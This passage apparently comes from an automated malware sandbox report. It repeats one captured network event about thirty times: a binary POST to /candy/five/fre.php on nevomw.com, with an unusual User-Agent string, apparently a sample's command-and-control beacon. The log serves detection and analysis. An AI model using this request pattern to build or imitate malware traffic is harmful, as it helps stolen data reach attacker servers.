                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: glo